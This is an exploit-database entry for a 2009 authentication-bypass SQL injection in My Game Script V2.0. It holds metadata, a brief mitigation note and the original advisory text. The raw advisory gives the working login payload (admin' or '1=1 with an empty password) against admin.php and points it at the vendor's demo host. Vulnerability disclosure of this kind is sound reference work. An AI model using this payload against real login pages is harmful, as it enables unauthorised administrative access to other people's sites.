My Game Script V2.0 (Auth Bypass) SQL Injection Vulnerability

vendor:

My Game Script

by:

ThE g0bL!N

CVSS

HIGH

SQL Injection

CWE

Product Name: My Game Script

Affected Version From: V2.0

Affected Version To: V2.0

Patch Exists: NO

Related CWE: N/A

CPE: 2.3:a:mygamescript.com:my_game_script:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

My Game Script V2.0 (Auth Bypass) SQL Injection Vulnerability

A SQL injection vulnerability exists in My Game Script V2.0, which allows an attacker to bypass authentication by entering a username of 'admin_name' or '1=1' and a blank password. This can be exploited by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, authentication should be done using a secure method such as hashing.

Source

Exploit-DB raw data:

---------------------------------------------------------------
------------------------------------------------------------
My Game Script V2.0 (Auth Bypass) SQL Injection Vulnerability 
---------------------------------------------------------------
Founder : ThE g0bL!N
Vendor:mygamescript.com
---------------------------------------------------------------
---------------------------------------------------------------
SQL Injection Vulnerability 
-------------------------
Exploit:
-------
http://victim/admin.php
username:[admin_name]' or '1=1
password: No Thing

--------------------------------------
Dem0
---
http://demo1.mygamescript.com/admin.php
Exploit F0r Demo
----------------
username:admin' or '1=1
password: No Thing
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-14]